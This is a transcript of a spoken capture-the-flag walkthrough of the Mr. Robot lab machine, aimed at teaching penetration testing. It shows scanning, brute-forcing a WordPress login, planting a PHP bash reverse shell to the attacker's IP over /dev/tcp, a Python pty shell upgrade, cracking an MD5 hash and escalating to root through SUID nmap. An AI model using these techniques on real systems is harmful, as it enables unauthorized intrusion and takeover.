Now the first thing, let's start with net discover. Okay, sudo root, so to make sure we are running on as a root. Now let's wait a little bit until we find the machine. Okay, now let's stop the scan. Actually it is this one. Okay, now let's start with nmap -a, put the IP address and press enter. Now as you can see, we found that port 22 is closed, but it is here. Port 80 is open and port 443 is open. Now if port 80 and port 443, the HTTPS are opened, so now let's run dir b HTTP. Now that put the IP address. Now here it will start scanning the machine. Now let's give it some time. Okay, now as you can see, we found something like /admin. We have robots.txt. Okay, now this is the dir b, the utility. We shouldn't depend on the tools itself. Okay, so sometimes we can just put the /readme /robots.txt /admin /wp login admin whatever. All right, so let's see the robots. Okay, this is the first one, so control and press on it. But first, yeah, as you can see, yeah, we found something. The user agent, we found this F society thing, whatever. We found key 1 of 3. Now let's have the key 1 of 3 here. Yeah, this is the first key. Cool, so far so good. Now we found another file, which is this one. Now let's see what it will give us. Yeah, it is a file. Now let's download it. Let's open it. Yeah, it seems I am already downloaded here. So open a terminal here. Now let's cat this file. And the file is F society disk. And you can see that, yeah, it contains a lot of string and values. Okay. All right. So far so good. Okay. Now what else we found here? Okay. Let's quit from this. We found that we have a /login. Let's go to that actually. /login, which is this one. Oh, it will redirect us to the WordPress, the wp-login.php. Okay. Okay, so far so good. Now actually for this we can use the wp scan utility. Okay, so let's quit from this for now, or we can leave it in the background, by the way, but we don't need it anyway for now. Now we will use the wp scan --url and put the IP address. Okay, /login or the IP address only, then -- enumerate u for user. So this will start enumerating for the users, so it will give us a list of users. Now let's give it some time. Okay, actually it will take so much time, so I will skip this. Okay, as you can see, Ctrl+Z to stop it. Now let's use this same command, but this time let's try guessing users. Okay, now because the Mr. Robot, the main character, is Elliot, so we will use Elliot. By the way, actually I have this as a shortcut for you, that by using Elliot, actually it took me some time to get or to guess it is Elliot, the username. Okay, but the conclusion, the username is Elliot. Okay, now how did I know that? Because I waited for almost 4 or 5 hours for this until it is start guessing some users, and I didn't find anything actually. So I tried to use a specific users, and one of the users is Elliot. So I started with Elliot, and well, I got lucky. All right, so we will use the wscan -t as a thread, and we will use 10,000, and we will use the user, which is Elliot. Okay, p as a user and p for the password, /f society. Okay, actually this is inside the downloads. All right, and then --url to put the HTTP, the IP address of the machine. Now let's press enter. Now if I give it some time, it will show us the password. Let's wait a little bit actually, because actually this is a 6 megabyte of characters, so which means 6 million characters. So it will start guessing the words. Actually, it has a lot of words here and a lot of lines. So yeah, it will take some time. So actually, it took me about 4 or 5 hours. Okay, maybe if your hardware is better than me, so it maybe take around 20 minutes or 30 minutes, 35 minutes, whatever. Okay. Anyway, the password after getting these, actually I am showing you the result of the scan. Okay, so if you want to do it the hard way, you need to wait. Okay, if you are ready to wait 4 hours or 5 hours, which is I recommend you to do, just open it in the background and complete your day. No issue at all. Okay, until you find it, like how did I found it. Okay, but I am just we can't wait 5 hours here in this lecture, so I'm just giving you the result. Okay, now so the login is Elliot as we saw, and the password is ER20, which is this one. This is the password. Okay, so far so good. Now if this is the password, let's put it here and let's put Elliot as the password and login, and this should work. As you can see, it is working now. Okay, now what we should do next is, actually this is a WordPress, remember, and this WordPress we can put a reverse shell on it as a PHP code, right? So let's go to the appearance. We should go from here, appearance, then the editor. Okay, theme editor, as you can see. Now here inside it, here at the top, let's put a PHP. This is PHP, this is WordPress, right? So this is a PHP, so let's put a simple PHP code, which is the exec command. Exec, and let's put inside it in double quotation /bin bash -c in a single quotation bash -i, put it to an ampersand /dev /tcp /12168, which is the IP address of my machine, which is this one. Okay, this is a reverse shell, which is this one. 8.1.104. Yeah, and /443 0, put it to the ampersand 1. Okay, now you may ask me, how did I go and how did I find about these? Actually, just open a cheat sheet, which is reverse shell cheat sheet. Okay, so nothing, you shouldn't memorize anything, no problem. Okay, so you can see that we have this reverse shell for the pentest monkey, and one of them is the PHP, as you can see, or you can have it as a bash, which is this one, no problem. Anyway, it will do the job, but I am using this as a PHP and executing a shell command, which is the bash -c, the bash dev and ampersand, and this is it. Okay, so let me remove this. Actually, this should be here on the first thing. Okay, like this, and the single quotation is like this. So yeah, now we are ready. But before I update the file, I need to open the shell as nc-nvlp and put the port number, which is, as you can see from here, 443. Yeah, as you can see. Now update the file, and then let's go to the style.css. Okay, or let's go to any one or anywhere here inside it. So let's put test, for example, or anything. Now if you open this, maybe something went wrong. Actually, I should go to the templates of the 404. Okay, so this is not found, right? So maybe I should cut this and put it on the templates of 404, which is this one. Okay, so let's me put this here and let's update it. Now I am listening, and if I press on test as is not found. Remember, test is not found. Anyway, we can put it either here or here. On the header as well. So let's update this. So if I go to the IP address of the machine, now let's go to something not found, which is test. Now you can see that we are able to connect, as you can see. All right. So we need to keep trying. By the way, this is the main website or the main page for the website. This is not showing because we are used that. No, actually this is just the default behavior or default page. Okay. Anyway, now as you can see here, we are seeing ls id. Now you can see that the ID is 1. We are the daemon user, and ls we are inside the machine. Okay, cool. So far so good. Now let's try to go to the home to see what is inside it. We have, if I type ls, you can see we have ls. No, actually we don't have it. This is the command. We have the robot inside it. Yeah, we have key 2 of 3. So let me try to cat it. Permission denied. Okay, no problem. Now let's try cat the password here. The password, we are able to access it. Okay, cool. But you can see that this is the robot and this is the password for the robot. So it seems that if I type su dash robot, no, it is not running. Okay, no problem. But you can see that we have this command or this warning must be run from a terminal, which means that we are not running through a TTY shell. Now, how to use such a thing? We can use Python. Let's see first if Python is installed. Yeah, it seems it is installed. Yeah, sorry, it got interrupted. Let's run again. Cool. cd home robot. Now let's try this Python -c and then import pty semicolon pty.spawn and open /bin/sh and press. Let's put this and put this, and yeah, you can see that now we are here. Now let's try type ls. You can see ls, it will show us some information. id, the same thing. So if I type su robot, first here it wasn't working correctly because there was an extra colon here, as you, or here extra single quotation. Now it is working. If I type ls, it will show us id, the same thing. Now if I type su robot, it will start asking for password. Now remember that password, we found it here, this one, when we cat the row -md5, this one. So let's try put this password actually. Yeah, here it is. Now let's put the password. Okay, it didn't work, no problem. But if you saw, actually this is md5. You can see that password.row md5. So from here, let's go to md5 cracker. Let's use crack station. Actually, this is a good one. And let's have the password or the md5 thing here. And let's put it here. Now let's crack the hash. Oh, you can see that this is the result. Now let's try this result. This is the crack of the result. So again, actually the arrows will not work. su robot and put the password, and oh, you can see that now we are able to connect. Now we are robot. Now if I go to home robot and try cat the key 1, key 2 of 3, I mean, okay, you can see that we got the second key. So far so good. What remains is the third key. Okay, no problem. Now after actually investigating the machine and checking a lot of things, we found out that we have nmap running as a root. Okay, now how did I know that? By searching a lot and by doing this command, find slash dash perm plus 6000. This means that this is suid, so this is which means run as the owner, and the owner will be root in that case. To as to div null, so in case of problems we will put it here, and let's grab the slash bin. Okay, now press enter. You will see that it will start searching about it, and one of them is the nmap. Okay, so we can use nmap dash dash interactive. So put the command dash dash interactive, press enter. Now we are inside the command. Now let's put shift 1 or the exclamation mark sh. If I type id now, oh, you can see that the EUID, effective user ID, is root. As you can see, the group is root, which means that we can go to the cd root ls cat the key 3 of 3. We are able to see the file or the content of the file. So by doing this, we are able to get the third file. Now, what is this first boot? Done. I'm not sure. It is empty. No problem. So you can see that we are able to get the third file. Now, this machine was good, actually exercise for us. Now, yeah, I know it is not that simple. There were a lot of guessing, actually, like the user is Elliot. So this is, we used the social engineering skills here. We used a lot of enumeration tools, guessing, brute forcing, and Python scripts, PHP, reverse shell, and more. Okay,